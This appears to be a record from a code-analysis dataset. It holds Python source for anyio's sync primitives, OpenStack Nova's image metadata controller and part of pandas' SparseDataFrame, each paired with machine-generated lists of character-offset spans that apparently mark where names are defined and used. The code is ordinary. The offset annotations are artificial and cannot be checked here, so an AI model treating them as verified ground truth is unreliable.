"""The number of tokens currently available to be borrowed"""
raise NotImplementedError
def acquire_nowait(self) -> DeprecatedAwaitable:
"""
Acquire a token for the current task without waiting for one to become available.
:raises ~anyio.WouldBlock: if there are no tokens available for borrowing
"""
raise NotImplementedError
def acquire_on_behalf_of_nowait(self, borrower) -> DeprecatedAwaitable:
"""
Acquire a token without waiting for one to become available.
:param borrower: the entity borrowing a token
:raises ~anyio.WouldBlock: if there are no tokens available for borrowing
"""
raise NotImplementedError
async def acquire(self) -> None:
"""
Acquire a token for the current task, waiting if necessary for one to become available.
"""
raise NotImplementedError
async def acquire_on_behalf_of(self, borrower) -> None:
"""
Acquire a token, waiting if necessary for one to become available.
:param borrower: the entity borrowing a token
"""
raise NotImplementedError
def release(self) -> None:
"""
Release the token held by the current task.
:raises RuntimeError: if the current task has not borrowed a token from this limiter.
"""
raise NotImplementedError
def release_on_behalf_of(self, borrower) -> None:
"""
Release the token held by the given borrower.
:raises RuntimeError: if the borrower has not borrowed a token from this limiter.
"""
raise NotImplementedError
def statistics(self) -> CapacityLimiterStatistics:
"""
Return statistics about the current state of this limiter.
.. versionadded:: 3.0
"""
raise NotImplementedError
def create_lock() -> Lock:
"""
Create an asynchronous lock.
:return: a lock object
.. deprecated:: 3.0
Use :class:`~Lock` directly.
"""
warn('create_lock() is deprecated -- use Lock() directly', DeprecationWarning)
return Lock()
def create_condition(lock: Optional[Lock] = None) -> Condition:
"""
Create an asynchronous condition.
:param lock: the lock to base the condition object on
:return: a condition object
.. deprecated:: 3.0
Use :class:`~Condition` directly.
"""
warn('create_condition() is deprecated -- use Condition() directly', DeprecationWarning)
return Condition(lock=lock)
def create_event() -> Event:
"""
Create an asynchronous event object.
:return: an event object
.. deprecated:: 3.0
Use :class:`~Event` directly.
"""
warn('create_event() is deprecated -- use Event() directly', DeprecationWarning)
return get_asynclib().Event()
def create_semaphore(value: int, *, max_value: Optional[int] = None) -> Semaphore:
"""
Create an asynchronous semaphore.
:param value: the semaphore's initial value
:param max_value: if set, makes this a "bounded" semaphore that raises :exc:`ValueError` if the
semaphore's value would exceed this number
:return: a semaphore object
.. deprecated:: 3.0
Use :class:`~Semaphore` directly.
"""
warn('create_semaphore() is deprecated -- use Semaphore() directly', DeprecationWarning)
return Semaphore(value, max_value=max_value)
def create_capacity_limiter(total_tokens: float) -> CapacityLimiter:
"""
Create a capacity limiter.
:param total_tokens: the total number of tokens available for borrowing (can be an integer or
:data:`math.inf`)
:return: a capacity limiter object
.. deprecated:: 3.0
Use :class:`~CapacityLimiter` directly.
"""
warn('create_capacity_limiter() is deprecated -- use CapacityLimiter() directly',
DeprecationWarning)
return get_asynclib().CapacityLimiter(total_tokens)
class ResourceGuard:
__slots__ = 'action', '_guarded'
def __init__(self, action: str):
self.action = action
self._guarded = False
def __enter__(self):
if self._guarded:
raise BusyResourceError(self.action)
self._guarded = True
def __exit__(self, exc_type, exc_val, exc_tb):
self._guarded = False
| [
[
[
24,
29
],
[
2960,
2965
],
[
5276,
5281
],
[
8331,
8336
]
],
[
[
54,
63
],
[
475,
484
],
[
641,
650
],
[
1220,
1229
],
[
1626,
1635
],
[
1930,
1939
]
],
[
[
82,
95
],
[
3201,
3214
],
[
5517,
5530
],
[
8607,
8620
],
[
10710,
10723
]
],
[
[
115,
120
],
[
2928,
2933
],
[
5261,
5266
],
[
8316,
8321
]
],
[
[
122,
130
],
[
1581,
1589
],
[
2854,
2862
],
[
5122,
5130
],
[
3071,
3079
],
[
3135,
3143
],
[
3192,
3200
],
[
5178,
5186
],
[
5387,
5395
],
[
5451,
5459
],
[
5508,
5516
],
[
7710,
7718
],
[
8477,
8485
],
[
8541,
8549
],
[
8598,
8606
],
[
10019,
10027
],
[
10729,
10737
],
[
10580,
10588
],
[
10644,
10652
],
[
10701,
10709
],
[
13959,
13967
],
[
14682,
14690
]
],
[
[
132,
137
],
[
1175,
1180
],
[
2934,
2939
]
],
[
[
139,
143
],
[
3080,
3084
],
[
5396,
5400
],
[
8486,
8490
],
[
10589,
10593
]
],
[
[
165,
169
],
[
11377,
11381
],
[
13833,
13837
],
[
14212,
14216
],
[
14518,
14522
],
[
15075,
15079
],
[
15572,
15576
]
],
[
[
194,
220
],
[
3844,
3870
],
[
9171,
9197
]
],
[
[
222,
232
],
[
7015,
7025
]
],
[
[
234,
257
],
[
3333,
3356
],
[
8775,
8798
]
],
[
[
279,
298
],
[
2201,
2220
],
[
4317,
4336
],
[
4673,
4692
],
[
6190,
6209
],
[
6298,
6317
],
[
9488,
9507
],
[
9823,
9842
],
[
11914,
11933
],
[
12223,
12242
]
],
[
[
323,
335
],
[
2156,
2168
],
[
10427,
10439
],
[
14610,
14622
],
[
15694,
15706
]
],
[
[
361,
378
],
[
15966,
15983
]
],
[
[
380,
390
],
[
3421,
3431
],
[
4247,
4257
],
[
8863,
8873
],
[
9425,
9435
]
],
[
[
411,
422
],
[
7317,
7328
]
],
[
[
445,
453
],
[
1590,
1598
],
[
2863,
2871
],
[
5131,
5139
],
[
2940,
2948
]
],
[
[
455,
471
],
[
3452,
3468
],
[
4055,
4071
],
[
4401,
4417
],
[
5636,
5652
],
[
5885,
5901
],
[
6145,
6161
]
],
[
[
504,
519
],
[
2701,
2716
]
],
[
[
670,
695
],
[
13477,
13502
]
],
[
[
1249,
1263
],
[
1912,
1926
],
[
4868,
4882
],
[
5018,
5032
]
],
[
[
1655,
1674
],
[
7409,
7428
],
[
7569,
7588
]
],
[
[
1959,
1978
],
[
10144,
10163
],
[
10304,
10323
]
],
[
[
2112,
2117
],
[
2950,
2955
],
[
3491,
3496
],
[
5267,
5272
],
[
7044,
7049
],
[
8322,
8327
],
[
8895,
8900
],
[
14357,
14362
]
],
[
[
2831,
2835
],
[
5187,
5191
],
[
5231,
5235
],
[
13684,
13688
],
[
13923,
13927
],
[
13968,
13972
]
],
[
[
5094,
5103
],
[
13985,
13994
],
[
14312,
14321
]
],
[
[
7642,
7651
],
[
14707,
14716
],
[
15175,
15184
]
],
[
[
10352,
10367
],
[
15267,
15282
]
],
[
[
13667,
13678
]
],
[
[
13936,
13952
]
],
[
[
14339,
14351
]
],
[
[
14639,
14655
]
],
[
[
15219,
15242
]
],
[
[
15747,
15760
]
]
] |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from nova.api.openstack.api_version_request import \
MAX_IMAGE_META_PROXY_API_VERSION
from nova.api.openstack import common
from nova.api.openstack.compute.schemas import image_metadata
from nova.api.openstack import wsgi
from nova.api import validation
from nova import exception
from nova.i18n import _
import nova.image
class ImageMetadataController(wsgi.Controller):
"""The image metadata API controller for the OpenStack API."""
def __init__(self):
self.image_api = nova.image.API()
def _get_image(self, context, image_id):
try:
return self.image_api.get(context, image_id)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
except exception.ImageNotFound:
msg = _("Image not found.")
raise exc.HTTPNotFound(explanation=msg)
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((403, 404))
def index(self, req, image_id):
"""Returns the list of metadata for a given instance."""
context = req.environ['nova.context']
metadata = self._get_image(context, image_id)['properties']
return dict(metadata=metadata)
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((403, 404))
def show(self, req, image_id, id):
context = req.environ['nova.context']
metadata = self._get_image(context, image_id)['properties']
if id in metadata:
return {'meta': {id: metadata[id]}}
else:
raise exc.HTTPNotFound()
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((400, 403, 404))
@validation.schema(image_metadata.create)
def create(self, req, image_id, body):
context = req.environ['nova.context']
image = self._get_image(context, image_id)
for key, value in body['metadata'].items():
image['properties'][key] = value
common.check_img_metadata_properties_quota(context,
image['properties'])
try:
image = self.image_api.update(context, image_id, image, data=None,
purge_props=True)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(metadata=image['properties'])
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((400, 403, 404))
@validation.schema(image_metadata.update)
def update(self, req, image_id, id, body):
context = req.environ['nova.context']
meta = body['meta']
if id not in meta:
expl = _('Request body and URI mismatch')
raise exc.HTTPBadRequest(explanation=expl)
image = self._get_image(context, image_id)
image['properties'][id] = meta[id]
common.check_img_metadata_properties_quota(context,
image['properties'])
try:
self.image_api.update(context, image_id, image, data=None,
purge_props=True)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(meta=meta)
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((400, 403, 404))
@validation.schema(image_metadata.update_all)
def update_all(self, req, image_id, body):
context = req.environ['nova.context']
image = self._get_image(context, image_id)
metadata = body['metadata']
common.check_img_metadata_properties_quota(context, metadata)
image['properties'] = metadata
try:
self.image_api.update(context, image_id, image, data=None,
purge_props=True)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(metadata=metadata)
@wsgi.Controller.api_version("2.1", MAX_IMAGE_META_PROXY_API_VERSION)
@wsgi.expected_errors((403, 404))
@wsgi.response(204)
def delete(self, req, image_id, id):
context = req.environ['nova.context']
image = self._get_image(context, image_id)
if id not in image['properties']:
msg = _("Invalid metadata key")
raise exc.HTTPNotFound(explanation=msg)
image['properties'].pop(id)
try:
self.image_api.update(context, image_id, image, data=None,
purge_props=True)
except exception.ImageNotAuthorized as e:
raise exc.HTTPForbidden(explanation=e.format_message())
| [
[
[
655,
658
],
[
1355,
1358
],
[
1503,
1506
],
[
2277,
2280
],
[
3049,
3052
],
[
3535,
3538
],
[
4003,
4006
],
[
4745,
4748
],
[
5213,
5216
],
[
5487,
5490
]
],
[
[
717,
749
],
[
1578,
1610
],
[
1945,
1977
],
[
2337,
2369
],
[
3190,
3222
],
[
4125,
4157
],
[
4875,
4907
]
],
[
[
781,
787
],
[
2705,
2711
],
[
3675,
3681
],
[
4440,
4446
]
],
[
[
835,
849
],
[
2437,
2451
],
[
3290,
3304
],
[
4225,
4239
]
],
[
[
881,
885
],
[
1019,
1023
],
[
1543,
1547
],
[
1617,
1621
],
[
1910,
1914
],
[
1984,
1988
],
[
2302,
2306
],
[
2376,
2380
],
[
3155,
3159
],
[
3229,
3233
],
[
4090,
4094
],
[
4164,
4168
],
[
4840,
4844
],
[
4914,
4918
],
[
4952,
4956
]
],
[
[
907,
917
],
[
2419,
2429
],
[
3272,
3282
],
[
4207,
4217
]
],
[
[
935,
944
],
[
1302,
1311
],
[
1420,
1429
],
[
2996,
3005
],
[
3950,
3959
],
[
4692,
4701
],
[
5434,
5443
]
],
[
[
967,
968
],
[
1463,
1464
],
[
3482,
3483
],
[
5169,
5170
]
],
[
[
976,
986
],
[
1154,
1158
]
],
[
[
995,
1018
]
]
] |
"""
Data structures for sparse float data. Life is made simpler by dealing only
with float64 data
"""
from __future__ import division
# pylint: disable=E1101,E1103,W0231,E0202
import warnings
from pandas.compat import lmap
from pandas import compat
import numpy as np
from pandas.core.dtypes.missing import isna, notna
from pandas.core.dtypes.cast import maybe_upcast, find_common_type
from pandas.core.dtypes.common import ensure_platform_int, is_scipy_sparse
from pandas.compat.numpy import function as nv
from pandas.core.index import Index, MultiIndex, ensure_index
from pandas.core.series import Series
from pandas.core.frame import DataFrame, extract_index, _prep_ndarray
import pandas.core.algorithms as algos
from pandas.core.internals import (BlockManager,
create_block_manager_from_arrays)
import pandas.core.generic as generic
from pandas.core.sparse.series import SparseSeries, SparseArray
from pandas._libs.sparse import BlockIndex, get_blocks
from pandas.util._decorators import Appender
import pandas.core.ops as ops
import pandas.core.common as com
import pandas.core.indexes.base as ibase
_shared_doc_kwargs = dict(klass='SparseDataFrame')
class SparseDataFrame(DataFrame):
"""
DataFrame containing sparse floating point data in the form of SparseSeries
objects
Parameters
----------
data : same types as can be passed to DataFrame or scipy.sparse.spmatrix
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : array-like, optional
    columns : array-like, optional
default_kind : {'block', 'integer'}, default 'block'
Default sparse kind for converting Series to SparseSeries. Will not
override SparseSeries passed into constructor
default_fill_value : float
Default fill_value for converting Series to SparseSeries
(default: nan). Will not override SparseSeries passed in.
"""
_subtyp = 'sparse_frame'
def __init__(self, data=None, index=None, columns=None, default_kind=None,
default_fill_value=None, dtype=None, copy=False):
# pick up the defaults from the Sparse structures
if isinstance(data, SparseDataFrame):
if index is None:
index = data.index
if columns is None:
columns = data.columns
if default_fill_value is None:
default_fill_value = data.default_fill_value
if default_kind is None:
default_kind = data.default_kind
elif isinstance(data, (SparseSeries, SparseArray)):
if index is None:
index = data.index
if default_fill_value is None:
default_fill_value = data.fill_value
if columns is None and hasattr(data, 'name'):
columns = [data.name]
if columns is None:
raise Exception("cannot pass a series w/o a name or columns")
data = {columns[0]: data}
if default_fill_value is None:
default_fill_value = np.nan
if default_kind is None:
default_kind = 'block'
self._default_kind = default_kind
self._default_fill_value = default_fill_value
if is_scipy_sparse(data):
mgr = self._init_spmatrix(data, index, columns, dtype=dtype,
fill_value=default_fill_value)
elif isinstance(data, dict):
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif isinstance(data, (np.ndarray, list)):
mgr = self._init_matrix(data, index, columns, dtype=dtype)
elif isinstance(data, SparseDataFrame):
mgr = self._init_mgr(data._data,
dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif isinstance(data, DataFrame):
mgr = self._init_dict(data, data.index, data.columns, dtype=dtype)
elif isinstance(data, Series):
mgr = self._init_dict(data.to_frame(), data.index,
columns=None, dtype=dtype)
elif isinstance(data, BlockManager):
mgr = self._init_mgr(data, axes=dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif data is None:
data = DataFrame()
if index is None:
index = Index([])
else:
index = ensure_index(index)
if columns is None:
columns = Index([])
else:
for c in columns:
data[c] = SparseArray(np.nan, index=index,
kind=self._default_kind,
fill_value=self._default_fill_value)
mgr = to_manager(data, columns, index)
if dtype is not None:
mgr = mgr.astype(dtype)
else:
msg = ('SparseDataFrame called with unknown type "{data_type}" '
'for data argument')
raise TypeError(msg.format(data_type=type(data).__name__))
generic.NDFrame.__init__(self, mgr)
@property
def _constructor(self):
return SparseDataFrame
_constructor_sliced = SparseSeries
def _init_dict(self, data, index, columns, dtype=None):
# pre-filter out columns if we passed it
if columns is not None:
columns = ensure_index(columns)
data = {k: v for k, v in compat.iteritems(data) if k in columns}
else:
keys = com._dict_keys_to_ordered_list(data)
columns = Index(keys)
if index is None:
index = extract_index(list(data.values()))
def sp_maker(x):
return SparseArray(x, kind=self._default_kind,
fill_value=self._default_fill_value,
copy=True, dtype=dtype)
sdict = {}
for k, v in compat.iteritems(data):
if isinstance(v, Series):
# Force alignment, no copy necessary
if not v.index.equals(index):
v = v.reindex(index)
if not isinstance(v, SparseSeries):
v = sp_maker(v.values)
elif isinstance(v, SparseArray):
v = v.copy()
else:
if isinstance(v, dict):
v = [v.get(i, np.nan) for i in index]
v = sp_maker(v)
sdict[k] = v
# TODO: figure out how to handle this case, all nan's?
# add in any other columns we want to have (completeness)
nan_arr = np.empty(len(index), dtype='float64')
nan_arr.fill(np.nan)
nan_arr = sp_maker(nan_arr)
sdict.update((c, nan_arr) for c in columns if c not in sdict)
return to_manager(sdict, columns, index)
def _init_matrix(self, data, index, columns, dtype=None):
""" Init self from ndarray or list of lists """
data = _prep_ndarray(data, copy=False)
index, columns = self._prep_index(data, index, columns)
data = {idx: data[:, i] for i, idx in enumerate(columns)}
return self._init_dict(data, index, columns, dtype)
def _init_spmatrix(self, data, index, columns, dtype=None,
fill_value=None):
""" Init self from scipy.sparse matrix """
index, columns = self._prep_index(data, index, columns)
data = data.tocoo()
N = len(index)
# Construct a dict of SparseSeries
sdict = {}
values = Series(data.data, index=data.row, copy=False)
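        # Group the COO entries by column; each column becomes one SparseSeries
        # whose BlockIndex is built from that column's sorted row positions.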
for col, rowvals in values.groupby(data.col):
# get_blocks expects int32 row indices in sorted order
rowvals = rowvals.sort_index()
rows = rowvals.index.values.astype(np.int32)
blocs, blens = get_blocks(rows)
sdict[columns[col]] = SparseSeries(
rowvals.values, index=index,
fill_value=fill_value,
sparse_index=BlockIndex(N, blocs, blens))
# Add any columns that were empty and thus not grouped on above
sdict.update({column: SparseSeries(index=index,
fill_value=fill_value,
sparse_index=BlockIndex(N, [], []))
for column in columns
if column not in sdict})
return self._init_dict(sdict, index, columns, dtype)
def _prep_index(self, data, index, columns):
N, K = data.shape
if index is None:
index = ibase.default_index(N)
if columns is None:
columns = ibase.default_index(K)
if len(columns) != K:
raise ValueError('Column length mismatch: {columns} vs. {K}'
.format(columns=len(columns), K=K))
if len(index) != N:
raise ValueError('Index length mismatch: {index} vs. {N}'
.format(index=len(index), N=N))
return index, columns
def to_coo(self):
"""
Return the contents of the frame as a sparse SciPy COO matrix.
.. versionadded:: 0.20.0
Returns
-------
coo_matrix : scipy.sparse.spmatrix
If the caller is heterogeneous and contains booleans or objects,
the result will be of dtype=object. See Notes.
Notes
-----
The dtype will be the lowest-common-denominator type (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
        float32. By numpy.find_common_type convention, mixing int64
and uint64 will result in a float64 dtype.
"""
try:
from scipy.sparse import coo_matrix
except ImportError:
raise ImportError('Scipy is not installed')
dtype = find_common_type(self.dtypes)
cols, rows, datas = [], [], []
for col, name in enumerate(self):
s = self[name]
row = s.sp_index.to_int_index().indices
cols.append(np.repeat(col, len(row)))
rows.append(row)
datas.append(s.sp_values.astype(dtype, copy=False))
cols = np.concatenate(cols)
rows = np.concatenate(rows)
datas = np.concatenate(datas)
return coo_matrix((datas, (rows, cols)), shape=self.shape)
def __array_wrap__(self, result):
return self._constructor(
result, index=self.index, columns=self.columns,
default_kind=self._default_kind,
default_fill_value=self._default_fill_value).__finalize__(self)
def __getstate__(self):
# pickling
return dict(_typ=self._typ, _subtyp=self._subtyp, _data=self._data,
_default_fill_value=self._default_fill_value,
_default_kind=self._default_kind)
def _unpickle_sparse_frame_compat(self, state):
""" original pickle format """
series, cols, idx, fv, kind = state
if not isinstance(cols, Index): # pragma: no cover
from pandas.io.pickle import _unpickle_array
columns = _unpickle_array(cols)
else:
columns = cols
if not isinstance(idx, Index): # pragma: no cover
from pandas.io.pickle import _unpickle_array
index = _unpickle_array(idx)
else:
index = idx
series_dict = DataFrame()
for col, (sp_index, sp_values) in compat.iteritems(series):
series_dict[col] = SparseSeries(sp_values, sparse_index=sp_index,
fill_value=fv)
self._data = to_manager(series_dict, columns, index)
self._default_fill_value = fv
self._default_kind = kind
def to_dense(self):
"""
Convert to dense DataFrame
Returns
-------
df : DataFrame
"""
data = {k: v.to_dense() for k, v in compat.iteritems(self)}
return DataFrame(data, index=self.index, columns=self.columns)
def _apply_columns(self, func):
""" get new SparseDataFrame applying func to each columns """
new_data = {}
for col, series in compat.iteritems(self):
new_data[col] = func(series)
return self._constructor(
data=new_data, index=self.index, columns=self.columns,
default_fill_value=self.default_fill_value).__finalize__(self)
def astype(self, dtype):
return self._apply_columns(lambda x: x.astype(dtype))
def copy(self, deep=True):
"""
Make a copy of this SparseDataFrame
"""
result = super(SparseDataFrame, self).copy(deep=deep)
result._default_fill_value = self._default_fill_value
result._default_kind = self._default_kind
return result
@property
def default_fill_value(self):
return self._default_fill_value
@property
def default_kind(self):
return self._default_kind
@property
def density(self):
"""
Ratio of non-sparse points to total (dense) data points
represented in the frame
"""
tot_nonsparse = sum(ser.sp_index.npoints
for _, ser in compat.iteritems(self))
tot = len(self.index) * len(self.columns)
return tot_nonsparse / float(tot)
def fillna(self, value=None, method=None, axis=0, inplace=False,
limit=None, downcast=None):
new_self = super(SparseDataFrame,
self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast)
if not inplace:
self = new_self
# set the fill value if we are filling as a scalar with nothing special
# going on
if (value is not None and value == value and method is None and
limit is None):
self._default_fill_value = value
if not inplace:
return self
# ----------------------------------------------------------------------
# Support different internal representation of SparseDataFrame
def _sanitize_column(self, key, value, **kwargs):
"""
Creates a new SparseArray from the input value.
Parameters
----------
key : object
value : scalar, Series, or array-like
kwargs : dict
Returns
-------
sanitized_column : SparseArray
"""
def sp_maker(x, index=None):
return SparseArray(x, index=index,
fill_value=self._default_fill_value,
kind=self._default_kind)
if isinstance(value, SparseSeries):
clean = value.reindex(self.index).as_sparse_array(
fill_value=self._default_fill_value, kind=self._default_kind)
elif isinstance(value, SparseArray):
if len(value) != len(self.index):
raise AssertionError('Length of values does not match '
'length of index')
clean = value
elif hasattr(value, '__iter__'):
if isinstance(value, Series):
clean = value.reindex(self.index)
if not isinstance(value, SparseSeries):
clean = sp_maker(clean)
else:
if len(value) != len(self.index):
raise AssertionError('Length of values does not match '
'length of index')
clean = sp_maker(value)
# Scalar
else:
clean = sp_maker(value, self.index)
# always return a SparseArray!
return clean
def get_value(self, index, col, takeable=False):
"""
Quickly retrieve single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(index, col, takeable=takeable)
def _get_value(self, index, col, takeable=False):
if takeable is True:
series = self._iget_item_cache(col)
else:
series = self._get_item_cache(col)
return series._get_value(index, takeable=takeable)
_get_value.__doc__ = get_value.__doc__
def set_value(self, index, col, value, takeable=False):
"""
Put single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
value : scalar value
takeable : interpret the index/col as indexers, default False
Notes
-----
This method *always* returns a new object. It is currently not
particularly efficient (and potentially very expensive) but is provided
for API compatibility with DataFrame
Returns
-------
frame : DataFrame
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(index, col, value, takeable=takeable)
def _set_value(self, index, col, value, takeable=False):
dense = self.to_dense()._set_value(
index, col, value, takeable=takeable)
return dense.to_sparse(kind=self._default_kind,
fill_value=self._default_fill_value)
_set_value.__doc__ = set_value.__doc__
def _slice(self, slobj, axis=0, kind=None):
if axis == 0:
new_index = self.index[slobj]
new_columns = self.columns
else:
new_index = self.index
new_columns = self.columns[slobj]
return self.reindex(index=new_index, columns=new_columns)
def xs(self, key, axis=0, copy=False):
"""
Returns a row (cross-section) from the SparseDataFrame as a Series
object.
Parameters
----------
key : some index contained in the index
Returns
-------
xs : Series
"""
if axis == 1:
data = self[key]
return data
i = self.index.get_loc(key)
data = self.take([i]).get_values()[0]
return Series(data, index=self.columns)
# ----------------------------------------------------------------------
# Arithmetic-related methods
def _combine_frame(self, other, func, fill_value=None, level=None):
this, other = self.align(other, join='outer', level=level, copy=False)
new_index, new_columns = this.index, this.columns
if level is not None:
raise NotImplementedError("'level' argument is not supported")
if self.empty and other.empty:
return self._constructor(index=new_index).__finalize__(self)
new_data = {}
if fill_value is not None:
# TODO: be a bit more intelligent here
for col in new_columns:
if col in this and col in other:
dleft = this[col].to_dense()
dright = other[col].to_dense()
result = dleft._binop(dright, func, fill_value=fill_value)
result = result.to_sparse(fill_value=this[col].fill_value)
new_data[col] = result
else:
for col in new_columns:
if col in this and col in other:
new_data[col] = func(this[col], other[col])
# if the fill values are the same use them? or use a valid one
new_fill_value = None
other_fill_value = getattr(other, 'default_fill_value', np.nan)
if self.default_fill_value == other_fill_value:
new_fill_value = self.default_fill_value
elif np.isnan(self.default_fill_value) and not np.isnan(
other_fill_value):
new_fill_value = other_fill_value
elif not np.isnan(self.default_fill_value) and np.isnan(
other_fill_value):
new_fill_value = self.default_fill_value
return self._constructor(data=new_data, index=new_index,
columns=new_columns,
default_fill_value=new_fill_value
).__finalize__(self)
def _combine_match_index(self, other, func, level=None):
new_data = {}
if level is not None:
raise NotImplementedError("'level' argument is not supported")
new_index = self.index.union(other.index)
this = self
if self.index is not new_index:
this = self.reindex(new_index)
if other.index is not new_index:
other = other.reindex(new_index)
for col, series in compat.iteritems(this):
new_data[col] = func(series.values, other.values)
# fill_value is a function of our operator
fill_value = None
if isna(other.fill_value) or isna(self.default_fill_value):
fill_value = np.nan
else:
fill_value = func(np.float64(self.default_fill_value),
np.float64(other.fill_value))
return self._constructor(
new_data, index=new_index, columns=self.columns,
default_fill_value=fill_value).__finalize__(self)
def _combine_match_columns(self, other, func, level=None, try_cast=True):
# patched version of DataFrame._combine_match_columns to account for
# NumPy circumventing __rsub__ with float64 types, e.g.: 3.0 - series,
# where 3.0 is numpy.float64 and series is a SparseSeries. Still
# possible for this to happen, which is bothersome
if level is not None:
raise NotImplementedError("'level' argument is not supported")
new_data = {}
union = intersection = self.columns
if not union.equals(other.index):
union = other.index.union(self.columns)
intersection = other.index.intersection(self.columns)
for col in intersection:
new_data[col] = func(self[col], float(other[col]))
return self._constructor(
new_data, index=self.index, columns=union,
default_fill_value=self.default_fill_value).__finalize__(self)
def _combine_const(self, other, func, errors='raise', try_cast=True):
return self._apply_columns(lambda x: func(x, other))
def _reindex_index(self, index, method, copy, level, fill_value=np.nan,
limit=None, takeable=False):
if level is not None:
raise TypeError('Reindex by level not supported for sparse')
if self.index.equals(index):
if copy:
return self.copy()
else:
return self
if len(self.index) == 0:
return self._constructor(
index=index, columns=self.columns).__finalize__(self)
indexer = self.index.get_indexer(index, method, limit=limit)
indexer = ensure_platform_int(indexer)
mask = indexer == -1
need_mask = mask.any()
new_series = {}
for col, series in self.iteritems():
if mask.all():
continue
values = series.values
# .take returns SparseArray
new = values.take(indexer)
if need_mask:
new = new.values
# convert integer to float if necessary. need to do a lot
# more than that, handle boolean etc also
new, fill_value = maybe_upcast(new, fill_value=fill_value)
np.putmask(new, mask, fill_value)
new_series[col] = new
return self._constructor(
new_series, index=index, columns=self.columns,
default_fill_value=self._default_fill_value).__finalize__(self)
def _reindex_columns(self, columns, method, copy, level, fill_value=None,
limit=None, takeable=False):
if level is not None:
raise TypeError('Reindex by level not supported for sparse')
if notna(fill_value):
raise NotImplementedError("'fill_value' argument is not supported")
if limit:
raise NotImplementedError("'limit' argument is not supported")
if method is not None:
raise NotImplementedError("'method' argument is not supported")
# TODO: fill value handling
sdict = {k: v for k, v in compat.iteritems(self) if k in columns}
return self._constructor(
sdict, index=self.index, columns=columns,
default_fill_value=self._default_fill_value).__finalize__(self)
def _reindex_with_indexers(self, reindexers, method=None, fill_value=None,
limit=None, copy=False, allow_dups=False):
if method is not None or limit is not None:
raise NotImplementedError("cannot reindex with a method or limit "
"with sparse")
if fill_value is None:
fill_value = np.nan
reindexers = {self._get_axis_number(a): val
for (a, val) in compat.iteritems(reindexers)}
index, row_indexer = reindexers.get(0, (None, None))
columns, col_indexer = reindexers.get(1, (None, None))
if columns is None:
columns = self.columns
new_arrays = {}
for col in columns:
if col not in self:
continue
if row_indexer is not None:
new_arrays[col] = algos.take_1d(self[col].get_values(),
row_indexer,
fill_value=fill_value)
else:
new_arrays[col] = self[col]
return self._constructor(new_arrays, index=index,
columns=columns).__finalize__(self)
def _join_compat(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
if on is not None:
raise NotImplementedError("'on' keyword parameter is not yet "
"implemented")
return self._join_index(other, how, lsuffix, rsuffix)
def _join_index(self, other, how, lsuffix, rsuffix):
if isinstance(other, Series):
if other.name is None:
raise ValueError('Other Series must have a name')
other = SparseDataFrame(
{other.name: other},
default_fill_value=self._default_fill_value)
join_index = self.index.join(other.index, how=how)
this = self.reindex(join_index)
other = other.reindex(join_index)
this, other = this._maybe_rename_join(other, lsuffix, rsuffix)
from pandas import concat
return concat([this, other], axis=1, verify_integrity=True)
def _maybe_rename_join(self, other, lsuffix, rsuffix):
to_rename = self.columns.intersection(other.columns)
if len(to_rename) > 0:
if not lsuffix and not rsuffix:
raise ValueError('columns overlap but no suffix specified: '
'{to_rename}'.format(to_rename=to_rename))
def lrenamer(x):
if x in to_rename:
return '{x}{lsuffix}'.format(x=x, lsuffix=lsuffix)
return x
def rrenamer(x):
if x in to_rename:
return '{x}{rsuffix}'.format(x=x, rsuffix=rsuffix)
return x
this = self.rename(columns=lrenamer)
other = other.rename(columns=rrenamer)
else:
this = self
return this, other
def transpose(self, *args, **kwargs):
"""
Returns a DataFrame with the rows/columns switched.
"""
nv.validate_transpose(args, kwargs)
return self._constructor(
self.values.T, index=self.columns, columns=self.index,
default_fill_value=self._default_fill_value,
default_kind=self._default_kind).__finalize__(self)
T = property(transpose)
@Appender(DataFrame.count.__doc__)
def count(self, axis=0, **kwds):
if axis is None:
axis = self._stat_axis_number
return self.apply(lambda x: x.count(), axis=axis)
def cumsum(self, axis=0, *args, **kwargs):
"""
Return SparseDataFrame of cumulative sums over requested axis.
Parameters
----------
axis : {0, 1}
0 for row-wise, 1 for column-wise
Returns
-------
y : SparseDataFrame
"""
nv.validate_cumsum(args, kwargs)
if axis is None:
axis = self._stat_axis_number
